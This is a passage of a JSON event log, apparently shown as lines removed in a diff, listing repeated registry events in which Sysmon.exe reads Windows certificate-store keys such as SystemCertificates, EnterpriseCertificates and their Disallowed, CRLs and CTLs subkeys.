"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862770000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - 
"registry_value": "Software Publishing", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": 
"CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 